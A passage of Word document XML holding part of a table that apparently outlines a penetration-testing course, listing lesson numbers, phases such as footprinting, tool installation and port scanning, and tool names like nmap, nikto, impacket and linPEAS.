          <w:p w14:paraId="7FE05E21" w14:textId="06BBD7D2" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>l</w:t>
            </w:r>
            <w:r w:rsidRPr="00816C1A">
              <w:t xml:space="preserve">ocating </w:t>
            </w:r>
            <w:r>
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidRPr="00816C1A">
              <w:t xml:space="preserve">he </w:t>
            </w:r>
            <w:r>
              <w:t>n</w:t>
            </w:r>
            <w:r w:rsidRPr="00816C1A">
              <w:t xml:space="preserve">etwork </w:t>
            </w:r>
            <w:r>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="00816C1A">
              <w:t>ange</w:t>
            </w:r>
            <w:r w:rsidR="00755992">
              <w:t xml:space="preserve"> | metagoofil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="42749F37" w14:textId="77777777" w:rsidTr="000D1EE6">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="26F172A3" w14:textId="53A8CBA9" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>11-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="17C7A49E" w14:textId="64EBCCC3" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="61030D39" w14:textId="334F3E12" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Footprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4D1F3D04" w14:textId="7AD3BB4D" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>reverse dns lookup | dnsrecon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="31E98EE7" w14:textId="77777777" w:rsidTr="000D1EE6">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3B31FD8A" w14:textId="6C724CBC" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>21-39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7CBE0A84" w14:textId="02479F3C" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="07D85E52" w14:textId="49BB64A5" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Installing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="12A72956" w14:textId="19540CC1" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nessus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="671286EB" w14:textId="77777777" w:rsidTr="007D2453">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1C92FA10" w14:textId="45389331" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>21-39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4D8FF82D" w14:textId="3971D73F" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2730B150" w14:textId="790D963A" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Installing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="120F112C" w14:textId="38D7FFBA" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>openvas/gvm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="4D51E224" w14:textId="77777777" w:rsidTr="007D2453">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="37E0BAC3" w14:textId="50DB6F3B" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>21-39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0A0F3D97" w14:textId="28251C76" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="43699AA3" w14:textId="1265F9DC" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Installing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="455E4A36" w14:textId="1AC49851" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="111A4105" w14:textId="77777777" w:rsidTr="007D2453">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="31A4734A" w14:textId="2BF435CC" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>21-39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0CE79CAD" w14:textId="4253737F" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2C725491" w14:textId="2BFD2D53" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Installing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="39230F99" w14:textId="4A2FD78D" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>dirsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="616805EE" w14:textId="77777777" w:rsidTr="00F60CAD">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="607AE88A" w14:textId="68FE0E8C" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>21-39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5E4D18B7" w14:textId="2CD8B929" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6637DDFB" w14:textId="0F075C44" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Installing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="084BDCF3" w14:textId="52A89F0C" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>impacket | responder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="1344631B" w14:textId="77777777" w:rsidTr="000D1EE6">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="204B04E3" w14:textId="6E21B359" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>21-39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="79072D70" w14:textId="6AA879A6" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="23670BA3" w14:textId="64B44C76" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Installing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4336400F" w14:textId="79590484" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>linPEAS</w:t>
            </w:r>
            <w:r w:rsidR="007F4AA8">
              <w:t xml:space="preserve"> | lse.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="31AA98AE" w14:textId="77777777" w:rsidTr="000D1EE6">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="60CBC42F" w14:textId="4CC59877" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>41-69</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="501C446F" w14:textId="6AA66613" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>41</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="04323863" w14:textId="21C24034" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Port, Service and Web Page Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="15A9E45E" w14:textId="74FB96DE" w:rsidR="00132425" w:rsidRPr="00F60CAD" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nmap | masscan | Angry IP Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="3F9CE5CD" w14:textId="77777777" w:rsidTr="00F60CAD">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7F57D700" w14:textId="49028CFE" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>41-69</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="67E0185A" w14:textId="36291B5E" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>42</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1B13308E" w14:textId="3F818A2A" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Port, Service and Web Page Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4A3A74BA" w14:textId="049F7FE7" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nmap script engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="087CF1BE" w14:textId="77777777" w:rsidTr="00F60CAD">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
